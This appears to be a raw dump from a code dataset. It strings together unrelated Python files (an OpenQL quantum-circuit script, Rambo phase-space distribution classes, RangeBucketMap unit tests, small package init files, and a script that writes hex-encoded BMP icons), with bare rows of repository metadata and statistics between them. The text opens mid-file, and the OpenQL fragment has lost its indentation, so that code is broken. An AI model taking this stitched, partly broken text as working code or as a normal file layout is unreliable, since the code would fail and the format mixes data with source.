k.gate('ym90', (15,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
if measurement:
for q in range(num_qubits):
k.gate('measure', [q])
p.add_kernel(k)
p.compile()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform shceduler actication (yes or no)')
parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
parser.add_argument('--mapper', nargs='?', default='minextend', help='Mapper specification (base, minextend, minextendrc)')
parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
parser.add_argument('--out_dir', nargs='?', default='compiler_output', help='Folder name to store the compilation')
parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
args = parser.parse_args()
try:
circuit(args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
except TypeError:
print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
raise
| 26.59589
| 244
| 0.423481
| 5,161
| 31,064
| 2.534974
| 0.031002
| 0.428036
| 0.23114
| 0.017657
| 0.872736
| 0.872736
| 0.867309
| 0.857831
| 0.857831
| 0.857831
| 0
| 0.124577
| 0.239506
| 31,064
| 1,168
| 245
| 26.59589
| 0.429225
| 0
| 0
| 0.964625
| 0
| 0.000863
| 0.129539
| 0.000934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000863
| false
| 0
| 0.002588
| 0
| 0.003451
| 0.000863
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b9b8e73e3fdd8876fddb0ad5b400960b334a7592
| 128
|
py
|
Python
|
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | 1
|
2022-03-16T23:35:42.000Z
|
2022-03-16T23:35:42.000Z
|
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | null | null | null |
adasher/data_utils/__init__.py
|
Bhanuchander210/adasher
|
f1902ce23b7ec461d47da81eee68e7e67c1e4ab5
|
[
"MIT"
] | null | null | null |
from adasher.data_utils.__util import DF, Period, Periods
def time_period(dt1, dt2, name):
return Period(dt1, dt2, name)
| 18.285714
| 57
| 0.734375
| 20
| 128
| 4.5
| 0.75
| 0.2
| 0.266667
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037383
| 0.164063
| 128
| 6
| 58
| 21.333333
| 0.803738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
b9d25657407c98c719c723e18792b38b090227a2
| 1,519
|
py
|
Python
|
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | 2
|
2018-11-15T03:01:03.000Z
|
2020-02-25T16:54:02.000Z
|
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | null | null | null |
src/hepmc/core/densities/rambo.py
|
mathisgerdes/monte-carlo-integration
|
533d13eeb538fec46f8d5ed00e780153b68ba7d9
|
[
"MIT"
] | 1
|
2021-04-15T09:02:00.000Z
|
2021-04-15T09:02:00.000Z
|
import numpy as np
from ..density import Distribution
from .. import phase_space
class Rambo(Distribution):
def __init__(self, nparticles, E_CM):
self.mapping = phase_space.Rambo(E_CM, nparticles)
super().__init__(self.mapping.ndim, False)
def rvs(self, sample_size):
xs = np.random.random((sample_size, self.ndim))
return self.mapping.map(xs)
def pdf(self, xs):
return self.mapping.pdf(xs)
@property
def e_cm(self):
return self.mapping.e_cm
@e_cm.setter
def e_cm(self, value):
self.mapping.e_cm = value
@property
def nparticles(self):
return self.mapping.nparticles
@nparticles.setter
def nparticles(self, value):
self.mapping = phase_space.Rambo(self.e_cm, value)
class RamboOnDiet(Distribution):
def __init__(self, nparticles, E_CM):
self.mapping = phase_space.RamboOnDiet(E_CM, nparticles)
super().__init__(self.mapping.ndim, False)
def rvs(self, sample_size):
xs = np.random.random((sample_size, self.ndim))
return self.mapping.map(xs)
def pdf(self, xs):
return self.mapping.pdf(xs)
@property
def e_cm(self):
return self.mapping.e_cm
@e_cm.setter
def e_cm(self, value):
self.mapping.e_cm = value
@property
def nparticles(self):
return self.mapping.nparticles
@nparticles.setter
def nparticles(self, value):
self.mapping = phase_space.RamboOnDiet(self.e_cm, value)
| 23.734375
| 64
| 0.651086
| 204
| 1,519
| 4.647059
| 0.161765
| 0.050633
| 0.14346
| 0.088608
| 0.879747
| 0.845992
| 0.845992
| 0.845992
| 0.845992
| 0.845992
| 0
| 0
| 0.239631
| 1,519
| 63
| 65
| 24.111111
| 0.820779
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.311111
| false
| 0
| 0.066667
| 0.133333
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
b9f60a1f44261659f1049a1cd4f5d01188546b41
| 5,558
|
py
|
Python
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 2
|
2015-03-22T00:31:28.000Z
|
2021-01-31T16:24:42.000Z
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 1
|
2015-10-06T00:43:51.000Z
|
2015-10-06T02:36:36.000Z
|
Ranger/test/src/Collections/RangeBucketMapTest.py
|
er432/Ranger
|
a583b332ffe0e5db9f60a5716c9a5504d91fbd39
|
[
"BSD-3-Clause"
] | 2
|
2016-04-10T08:02:23.000Z
|
2020-12-11T06:17:41.000Z
|
import unittest
from Ranger.src.Collections.RangeBucketMap import RangeBucketMap
from Ranger.src.Range.Range import Range
debug = False
class RangeBucketMapTest(unittest.TestCase):
""" Unit Tests for RangeBucketMap.py """
def test_put(self):
if debug: print("Testing put")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
self.assertEqual(buckets.ranges[0], Range.closed(3,5))
self.assertEquals(buckets.items[0], set(['a']))
buckets.put(Range.closed(7,10), 'b')
self.assertEqual(len(buckets),2)
self.assertEqual(buckets.ranges[0], Range.closed(3,5))
self.assertEqual(buckets.ranges[1], Range.closed(7,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['b']))
buckets.put(Range.closed(4,8),'c')
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.closedOpen(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.openClosed(8,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
def test_get(self):
if debug: print("Testing get")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
self.assertEqual(buckets.get(6),set(['c']))
self.assertEqual(buckets.get(4),set(['a','c']))
self.assertEquals(buckets.get(Range.closed(0,20)),set(['a','b','c']))
self.assertEquals(buckets.get(Range.openClosed(5,8)),set(['b','c']))
def test_get_bugfix1(self):
if debug: print("Testing get under first bugfix")
buckets = RangeBucketMap()
buckets.put(Range.closed(67432367,67434244),'G')
buckets.put(Range.closed(67432367,67434244),'T1')
buckets.put(Range.closed(67432375,67434015),'T2')
buckets_dict = dict((v,k) for k,v in buckets.iteritems())
self.assertEqual(buckets_dict['T2'], Range.closed(67432375,67434015))
def test_remove(self):
if debug: print("Testing remove")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
buckets.remove(Range.closed(3,3))
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.openClosed(8,10))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
buckets.remove(Range.closed(9,20))
self.assertEqual(len(buckets),5)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closed(4,5))
self.assertEqual(buckets.ranges[2], Range.open(5,7))
self.assertEqual(buckets.ranges[3], Range.closed(7,8))
self.assertEqual(buckets.ranges[4], Range.open(8,9))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['c']))
self.assertEqual(buckets.items[3], set(['b','c']))
self.assertEqual(buckets.items[4], set(['b']))
buckets.remove(Range.closed(5,7))
self.assertEqual(len(buckets),4)
self.assertEqual(buckets.ranges[0], Range.open(3,4))
self.assertEqual(buckets.ranges[1], Range.closedOpen(4,5))
self.assertEqual(buckets.ranges[2], Range.openClosed(7,8))
self.assertEqual(buckets.ranges[3], Range.open(8,9))
self.assertEqual(buckets.items[0], set(['a']))
self.assertEqual(buckets.items[1], set(['a','c']))
self.assertEqual(buckets.items[2], set(['b','c']))
self.assertEqual(buckets.items[3], set(['b']))
def test_iteritems(self):
if debug: print("Testing iteritems")
buckets = RangeBucketMap()
buckets.put(Range.closed(3,5),'a')
buckets.put(Range.closed(7,10),'b')
buckets.put(Range.closed(4,8),'c')
iterator = buckets.iteritems(2,10)
self.assertEquals(next(iterator), (Range.closed(3,5), 'a'))
self.assertEquals(next(iterator), (Range.closed(4,8), 'c'))
self.assertEquals(next(iterator), (Range.closed(7,10), 'b'))
with self.assertRaises(StopIteration):
next(iterator)
iterator = buckets.iteritems(3,8)
self.assertEquals(next(iterator), (Range.closed(3,5), 'a'))
self.assertEquals(next(iterator), (Range.closed(4,8), 'c'))
self.assertEquals(next(iterator), (Range.closed(7,8), 'b'))
with self.assertRaises(StopIteration):
next(iterator)
if __name__ == "__main__":
debug = True
unittest.main(exit = False)
| 49.625
| 77
| 0.624685
| 737
| 5,558
| 4.689281
| 0.104478
| 0.221354
| 0.292824
| 0.178241
| 0.804398
| 0.76765
| 0.697627
| 0.660301
| 0.632813
| 0.619792
| 0
| 0.049623
| 0.187837
| 5,558
| 111
| 78
| 50.072072
| 0.715995
| 0.005757
| 0
| 0.574074
| 0
| 0
| 0.027909
| 0
| 0
| 0
| 0
| 0
| 0.574074
| 1
| 0.046296
| false
| 0
| 0.027778
| 0
| 0.083333
| 0.046296
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9ff1a2cb9aa9de7941c92a74be607ff50750766
| 204
|
py
|
Python
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 2
|
2017-07-10T19:15:04.000Z
|
2021-07-07T14:27:39.000Z
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 7
|
2017-07-10T17:16:37.000Z
|
2017-12-12T02:06:18.000Z
|
src/audit_alembic/__init__.py
|
jpassaro/Audit-Alembic
|
3f0d83cd9965933ee6779ca335fd0945aa853969
|
[
"MIT"
] | 3
|
2017-12-12T02:04:16.000Z
|
2018-03-14T02:17:04.000Z
|
__version__ = "0.2.0"
from . import exc # noqa: F401
from .base import Auditor # noqa: F401
from .base import CommonColumnValues # noqa: F401
from .base import alembic_supports_callback # noqa: F401
| 29.142857
| 57
| 0.740196
| 29
| 204
| 5
| 0.482759
| 0.22069
| 0.248276
| 0.331034
| 0.455172
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089286
| 0.176471
| 204
| 6
| 58
| 34
| 0.77381
| 0.210784
| 0
| 0
| 0
| 0
| 0.032051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e04d783221856972c4b63e71a76928532e617ca2
| 102
|
py
|
Python
|
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
cloeepy_mongo/__init__.py
|
cloeeai/CloeePy-Mongo
|
4fa7cde79e8f62bf089985c595e4c9e8806b1166
|
[
"MIT"
] | null | null | null |
from cloeepy_mongo.cloeepy_mongo import CloeePyMongo
def get_plugin_class():
return CloeePyMongo
| 20.4
| 52
| 0.833333
| 13
| 102
| 6.230769
| 0.769231
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127451
| 102
| 4
| 53
| 25.5
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
e04f2bea1cb0d44b0ce2b413f21e9debf566f4e0
| 10,433
|
py
|
Python
|
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
"BSD-3-Clause"
] | null | null | null |
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
"BSD-3-Clause"
] | null | null | null |
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import binascii
import os
import imghdr
def main():
fd = "images" # 画像フォルダ
if not os.path.exists(fd):
os.mkdir(fd)
os.chdir(fd)
#画像の十六進法のバイト列の辞書。キー:画像名、値:十六進数バイト列
dic = {"image1ImageSmall":b"424df80000000000000076000000280000001000000010000000010004000000000000000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c0008080800000000000000080000080800000800000808000008000000080008000cccccccccccccccc2c266b181b666c2c5cc66b818b6665c555566b181b66655555566b818b66655555566b181b6665555a8666bbb6668a55a0a866666668a0a5000a8666668a000a6000a86668a000a556000a868a000a55556000a8a000a5555556000a000a55555555600000a55555555556000a55555555555560a55555550000",
"image1ImageBig":b"424d180200000000000076000000280000001a0000001a000000010004000000000000000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c000808080000000000000008000008080000080000080800000800000008000800055555555555555555555555555999990cccccccccccccccccccccccccc9055552cc2c6666b18181b6666c2cc2c99ccccc2ccc6666b81818b66668c2cc5902cc25c2586666b18181b66668ccc5590c2cc555586666b81818b6666855555995c25555586666b18181b6666855555995555555586666b81818b6666855555005555555586666b18181b666685555590555555a5866666b181b6666685a5550955555a0a8666666bbb6666668a0a559955a5a000a866666666666668a000a5995a0a00000a8666666666668a00000a90a000600000a86666666668a00000a50900005600000a866666668a00000a5599600055600000a8666668a00000a555095600555600000a86668a00000a55559955605555600000a868a00000a5555599555655555600000a8a00000a555555005555555555600000a00000a555555590555555555556000000000a555555550955555555555560000000a555555555995555555555555600000a555555555590555555555555556000a555555555550055555555555555560a555555555555905555555555555555555555555555559055550000",
"image1ImageSmallHC":b"424df60000000000000076000000280000001000000010000000010004000000000080000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c00080808000000000000000800000808000008000008080000080000000800080002222222222222222222996969699922252299669669995255559969696999555555996696699955555599696969995555969996669996955969699999996969566696999996966699666969996966695596669696966695555966696966695555559666966695555555596666695555555555966695555555555559695555555",
"image2ImageSmall":b"424d36030000000000003600000028000000100000001000000001001800000000000003000000000000000000000000000000000000ff00ffff00ffff00ffff00fff0eeee6c5f602512133c2b2c2b1719594a4bdcd8d8ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff5443453a2525d0c5bdffffffffffffffffffe6e7e8493c3c5e514eb7b1b0ff00ffff00ffff00ffff00ffff00ff5c4a4dc0bbbcfffffffbeadee7bca8e7bcabdfb4a2f1c4b0fffffad0d0cd584a4dc5bbb8ff00ffff00ffff00ffddd9d9514449ffffffd49578b7511eb5582ed29d85ce8b6db54513ba5f32eeccb8fffffffffffbd3cfcfff00ffff00ffd9cdc5e0d9dadc9270ba4613bf511dc99076edeae7f2dcced27b54bc4811ba5724d3ad96ffffff402d30ff00ffefeae6e9e0daeabba4ba4308cb5b28cb5f2ecc7046d99979db8f66ce6635cc5d2dbf4e1ab85225ffeee5726361b1aaaad8cbc2ffffffbf4911c65b21cf6532cc5d2bcc764edbae97dfa284ce6a3bcc5b2bcc602ebb4310d28259ffffff332124d7cbc2fffffebb2600d0703bcc612ecb5b2bca7a56dfd3cdf5f4f1e1a686cd6333ce622dc95e2abe3901ffffff2b1a1dd8cdc4ffffffbe2f00d36f40cb602dcb5928c95a29ce8666e9ded7f1dcd2d77e56cd612acc6530c43a00ffffff312125d5c8beffffffcf3f00d66e3dcc632fc95d2ccb5522c44f19cf8c6becd4ccde9b81d06435d05b26c65619ffffff251317d9cdc5fefffff09361e87437da794ad29a7edfa68ad56f3bd5835bedd5cbe3b399d36939db6126e9b395ffffff3f3033f5f2f0ded6d1fff1e4f9a36ff28b52e3b39beeefedf3e5d9f2e7def4f0eaeba87ee66d2fee9e72fffffcb28d89c7c6c6ff00ffcbb6aaffffffffebdcfec08ff6b584edcebbeddaddf3dfdff5cab3f79c66fbaa7dfce8dcffffffb99e9bff00ffff00ffdccbc3e0d6cef2f2f2fffffcfff2d1fadca3f6cf91fac588fdc68bffe4c5fffefaffffffe2d4c8f2efeeff00ffff00ffff00fff0ebe6dfd0c9dbcac2f8f7f4fffffffffffffffffffdf8f2e3d9d1cfbfb4ebe3ddff00ffff00ffff00ffff00ffff00ffff00ffff00fffafaf9e1d6ced5c2b9d9c9c2d5c6beddcfc8f4f0efff00ffff00ffff00ffff00ffff00ff",
"image2ImageBig":b"424d560800000000000036000000280000001a0000001a00000001001800000000002008000000000000000000000000000000000000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff524142524142524142524142524142524142524142524142ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ff524142524142bda69cd6c7bddecfc6ded7d6e7dfd6e7d7cebdbebdb59694524142524142ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ff524142fffffffffffffffffffffffffffffffffffffffffff7f7f7ffffffffffffffefefbdb6ad524142524142ff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ff524142ffffffffffffffffffefefefdedfdebdb6adc6a694d6a68cdebeade7d7ceefefeff7f7f7ffffffefe7deefe7de524142ff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffbda69cffffffffffffffffffefe7ded6a68cbd6139bd5929ce6942c6795abd5929bd5931ce8663debeadefefeffffffffff7f7efe7de524142ff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffbda69cffffffffffffe7cfc6ce7142bd5929bd5929bd6139d6c7bdffffffd69e84bd5929bd5929bd5929d69e7befefefffffffffefef524142ff00ffff00ffff00ffff00ff0000ff00ffff00ffdecfc6ffffffffffffe7cfc6c66139bd5929c66131ce6131bd7152dedfdeffffffe7c7bdce6131ce6131bd5929bd5929ce8e6befefefffffffdecfc6524142ff00ffff00ffff00ff0000ff00ffff00ffdecfc6ffffffefe7e7ce7142c66131ce6131ce6131ce6131c66131d6a68cefcfbdd68652ce6131ce6131ce6131c66131bd5929d6a68cffffffffffff524142ff00ffff00ffff00ff0000ff00ffdecfc6fff7f7ffffffdeae94bd5929ce6131ce6931ce6131ce6131ce6131ce6939d67142ce6131ce6131ce6131ce6131ce6131bd5929c66139f7dfd6ffffffdecfc6524142ff00ffff00ff0000ff00ffdecfc6fffffff7efefd6714ac66131ce6931ce6931ce6131ce6131c66939debeadffefe7de966bc66131ce6131ce6131ce6131ce6131bd5929deae94ffffffffefe7524142ff00ffff00ff0000ff00ffdecfc6ffffffefd7cece6131ce6931ce6931ce6131ce6131ce6131c66939d6d7d6ffffffdeb69cce6131ce6131ce6131ce6131ce6131bd5929ce8e63f7f7f7ffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffefc7adce6131ce6939ce6931ce6131ce6131ce6131ce6131c6a694f7f7f7fff7efd68e63ce6131ce6131ce6131ce6931ce6131d6714af7efefffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffefc7adce6131d66939ce6931ce6131ce6131ce6131ce6131c66139debeadfffffffff7efd68e63ce6131ce6931ce6931ce6131d6714af7efefffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffcfb5d67139d67142d66939ce6131ce6131ce6131ce6131ce6131c66939d6c7bdffffffffefefd6714ace6131d66939ce6931d68652fff7f7ffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffe7dee7794ade7142d67139ce6931ce6131ce6131ce6131ce6131ce6131ce7142f7efefffffffe7ae94ce6131d66939d66939d69673ffffffffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffffffefa67bef8652de7142d6714adebeadefdfcede9e7bce6131ce6131ce6131f7dfd6ffffffefc7add66939de7142d66939efc7b5ffffffffefef524142ff00ffff00ff0000ff00ffdecfc6f7f7f7ffffffffdfc6f7965af78e5ade794acecfceffffffffefe7d68652ce6131d69e84ffffffffffffdeae94d67139de7142ef9663fff7f7ffffffd6c7bd524142ff00ffff00ff0000ff00ffff00ffdecfc6fffffffffffff7c7adff9e6bf7965ad69e84efefeffffffffffff7ffefdeffffffffffffefe7e7ef9663e7864aef8652f7dfceffffffffffffb59694ff00ffff00ffff00ff0000ff00ffff00ffdecfc6f7f7efffffffffffffffd7adffb684ffa673efb69cdedfdeefefefefefefefefefefe7deefae8cf7965aff9663ffcfb5ffffffffffffdecfc6b59694ff00ffff00ffff00ff0000ff00ffff00ffff00ffdecfc6ffffffffffffffffffffefd6ffdfadffc794ffc794efb69cefb69cffbe9cffb684ffae7bffb68cffe7d6fffffffffffff7efe7bdb6adff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffdecfc6fffffffffffffffffffffff7ffffe7ffffd6ffefb5ffefb5ffdfadffdfadffefd6fffff7fffffffffffffff7efdecfc6ff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffdecfc6fff7efffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdecfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffdecfc6decfc6fff7effffffffffffffffffffffffffffffffffffffffff7decfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffdecfc6decfc6decfc6decfc6decfc6decfc6decfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000",
"image2ImageSmallHC":b"424d36030000000000003600000028000000100000001000000001001800000000000003000000000000000000000000000000000000ff00ffff00ffff00ffff00fff0eeee6c5f602512133c2b2c2b1719594a4bdcd8d8ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff5443453a2525d0c5bdffffffffffffffffffe6e7e8493c3c5e514eb7b1b0ff00ffff00ffff00ffff00ffff00ff5c4a4dc0bbbcffffffffffffffffffffffffffffffffffffffffffd0d0cd584a4dc5bbb8ff00ffff00ffff00ffddd9d9514449ffffffffffffffffffffffff251317251317fffffffffffffffffffffffffffffbd3cfcfff00ffff00ffd9cdc5e0d9daffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff402d30ff00ffefeae6e9e0daffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffff726361b1aaaad8cbc2ffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffffffffff332124d7cbc2fffffeffffffffffffffffffffffffffffff251317251317000000ffffffffffffffffffffffffffffff2b1a1dd8cdc4ffffffffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffff312125d5c8beffffffffffffffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffff251317d9cdc5feffffffffffffffffffffff000000000000ffffffffffff251317251317ffffffffffffffffffffffff3f3033f5f2f0ded6d1ffffffffffffffffff000000251317251317251317251317000000ffffffffffffffffffb28d89c7c6c6ff00ffcbb6aaffffffffffffffffffffffff000000251317251317000000ffffffffffffffffffffffffb99e9bff00ffff00ffdccbc3e0d6cef2f2f2fffffffffffffffffffffffffffffffffffffffffffffefaffffffe2d4c8f2efeeff00ffff00ffff00fff0ebe6dfd0c9dbcac2f8f7f4fffffffffffffffffffdf8f2e3d9d1cfbfb4ebe3ddff00ffff00ffff00ffff00ffff00ffff00ffff00fffafaf9e1d6ced5c2b9d9c9c2d5c6beddcfc8f4f0efff00ffff00ffff00ffff00ffff00ff"
}
for name,hexdata in dic.items():
data = binascii.a2b_hex(hexdata) # 十六進数バイト列をバイナリに変換。
